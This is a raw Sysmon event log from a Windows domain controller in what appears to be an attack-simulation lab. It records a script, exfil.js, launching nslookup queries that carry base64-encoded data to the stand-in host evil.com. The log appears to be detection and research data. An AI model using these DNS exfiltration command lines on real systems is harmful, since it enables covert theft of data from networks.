14:21:54.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.957{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.957{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-C546-000000005F02}2848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.957{2E1864BB-1902-629A-C346-000000005F02}78607692C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-C546-000000005F02}2848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.969{2E1864BB-1902-629A-C546-000000005F02}2848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-C346-000000005F02}7860C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmylbmq.tmp 2>&1 10341000x8000000000000000216687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.926{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-C446-000000005F02}5384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.926{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-C446-000000005F02}5384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.926{2E1864BB-1902-629A-C446-000000005F02}53844640C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-C346-000000005F02}7860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.906{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-C446-000000005F02}5384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.886{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.886{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.886{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.886{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-C346-000000005F02}7860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.886{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.886{2E1864BB-18E0-629A-6742-000000005F02}39765916C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-C346-000000005F02}7860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.899{2E1864BB-1902-629A-C346-000000005F02}7860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmylbmq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.886{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnsju.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.855{2E1864BB-1902-629A-C146-000000005F02}59884288C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-C246-000000005F02}7340C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.855{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.855{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.855{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.855{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-C246-000000005F02}7340C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.855{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.855{2E1864BB-1902-629A-C046-000000005F02}21325828C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-C246-000000005F02}7340C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.863{2E1864BB-1902-629A-C246-000000005F02}7340C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-C046-000000005F02}2132C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnsju.tmp 2>&1 10341000x8000000000000000216667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.824{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-C146-000000005F02}5988C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.824{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-C146-000000005F02}5988C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.824{2E1864BB-1902-629A-C146-000000005F02}59884288C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-C046-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.808{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-C146-000000005F02}5988C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.807{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 